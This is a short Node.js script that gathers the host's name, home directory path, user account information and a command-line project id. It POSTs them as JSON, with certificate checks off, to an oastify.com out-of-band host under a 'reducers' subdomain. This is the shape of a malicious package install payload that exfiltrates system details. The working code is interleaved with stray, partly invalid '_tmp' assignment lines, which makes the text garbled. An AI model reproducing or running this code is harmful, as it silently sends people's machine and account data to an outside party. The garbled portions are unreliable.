const https = require('https')
var os = require("os")
var hostname = os.hostname()
var path = os.homedir()
var userInfo = os.userInfo()
const data = new TextEncoder().encode(
  JSON.stringify({
    hostname: hostname,
    project_id: process.argv[2],
    path: path,
    userInfo: userInfo
  })
)
JSON.stringify({
    hostname: hostname,
    project_id: process.argv[2],
    path: path,
    userInfo: userInfo
  })
_tmp_2.hostname = hostname
_tmp_2.project_id = process.argv[2]
_tmp_2.path = path
_tmp_2.userInfo = userInfo
const options = {
  hostname: process.argv[2] + '.' + "reducers" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}
_tmp_3.hostname = process.argv[2] + '.' + "reducers" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com'
_tmp_3.port = 443
_tmp_3.path = "/"
_tmp_3.method = "POST"
_tmp_3.headers = {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  }
_tmp_4.Content-Type = "application/json"
_tmp_4.Content-Length = data.length
_tmp_3.rejectUnauthorized = false
const req = https.request(options, res => {})
req.write(data)
